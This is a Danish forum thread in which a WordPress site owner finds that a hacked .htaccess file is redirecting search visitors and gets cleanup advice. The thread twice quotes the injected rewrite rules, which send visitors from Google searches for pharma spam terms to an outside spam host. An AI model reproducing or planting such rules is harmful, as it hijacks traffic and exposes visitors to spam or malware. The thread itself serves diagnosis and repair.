Kan nogen forklarer, hvorfor Google har indekseret puppetfestival.dk således?
Der er ikke noget i koden, så vidt jeg kan se.
Kan nogen forklarer, hvorfor Google har indekseret puppetfestival.dk således?
Der er ikke noget i koden, så vidt jeg kan se.
Har du kigget i htaccess?
Det ligner umiskendeligt noget cloaking. Nogen har hacket sitet, og lagt kode ind der viser en alternativ version af sitet til Google. Du skal altså i gang med en større oprydning af hele kodebasen samt databasen.
Ja, der er noget i .htaccess:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} (viagra|generic|cialis|online|drug|price|sildenafil|cheap|india|canad|prescription).* [NC]
RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) [NC]
RewriteRule ^.*$ http://acaib.comsyhost.com/wordpress/?tds-key=%1 [NC,L]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
Det er jo nok det med kursiv, der er problemet. Er der en smart måde at rydde op på?
Den ska se sådan her ud
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
og husk at chmod er 644
Jeg mener man bare sletter det i htaccess og så er den fixet
Ja, hvis du fjerner
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} (viagra|generic|cialis|online|drug|price|sildenafil|cheap|india|canad|prescription).* [NC]
RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) [NC]
RewriteRule ^.*$ http://acaib.comsyhost.com/wordpress/?tds-key=%1 [NC,L]
</IfModule>
bør du have fjernet problemet midlertidigt (startende fra det tidspunkt hvor Google kommer og reindekserer dig). Men der er nogen der har haft adgang til enten din server, eller din WordPress installation, så at rydde op i .htacces er symptombehandling, det løser ikke det sikkerhedsproblem der tydeligvis har ramt dig.
Koden er fjernet og så må jeg hellere kontakte Wannafind og fortælle dem, at de har nogle problemer.
Jeg har kikket lidt rundt og fundet noget snavs i index.php i nuværende tema.
Så må jeg hellere skifte adgangskode for brugerne. Og andre koder.
Hvad gør jeg med evt. snavs i db? Findes der en god cleaner eller lign.
eventuelt skulle du tilmelde dine websites:
sucuri.net
De tager også sites ind der allerede ER inficeret og renser dem.
Men det koster selvfølgelig.
Du skal være logget ind for at skrive.